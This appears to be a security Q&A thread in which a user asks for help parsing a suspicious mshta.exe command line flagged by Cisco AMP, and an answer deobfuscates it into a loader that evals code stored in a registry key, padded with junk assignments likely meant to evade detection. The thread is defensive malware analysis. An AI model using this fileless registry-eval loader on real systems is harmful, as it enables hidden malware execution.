# How to read command line argument for potential issue

Tags: javascript, registry, ioc

I have a IOC that has a command line argument that looks like this below. Wanted to see if someone could help me parse it out a little bit to understand what is happening.

```
C:\Windows\System32\mshta.exe javascript:GO3sOtu=BN1;Z0y=new%20ActiveXObject(WScript.Shell);Aer53IGv=BY5S;Quaj7=Z0y.RegRead(HKCU\\software\\najpigann\\hspi);RDYKO79Ji=0xq;eval(Quaj7);YWy5A0Za=Fl2JV;
```

Comment: it's javascript - have you tried parsing it as such?

Comment: do you know what `mshta` is?

Comment: where did this IOC come from?

Comment: It came from Cisco AMP.

Answer (score 1, accepted):

[mshta.exe](http://www.file.net/process/mshta.exe.html) parses web code to run.

If you take the Javascript and run it through a [beautifier](http://jsbeautifier.org/):

```
GO3sOtu = BN1;
Z0y = new ActiveXObject(WScript.Shell);
Aer53IGv = BY5S;
Quaj7 = Z0y.RegRead(HKCU\\ software\\ najpigann\\ hspi);
RDYKO79Ji = 0x q;
eval(Quaj7);
YWy5A0Za = Fl2JV;
```

At this point, it's simple to piece together the code flow:

```
eval(new ActiveXObject(WScript.Shell).RegRead(HKCU\software\najpigann\hspi))
```

Comment: I understood the javascript was being passed and understood that mshta was parsing that. What I wasn't following are the items you listed and what they were doing.

For example what is going on with the `GO3sOtu = BN1;` piece? That's what I was wanting to understand. I see the pieces that led to the item you put together. Is the rest just garbage?

Comment: When posting, make sure you include the scope of the question, like the parts you understand and the parts you don't

Comment: From a Javascript perspective, they do nothing. Either the IOC does not include all the other code (most likely), or it's included to try to evade detection.

Comment: Noted on the question etiquette. Thanks for your help.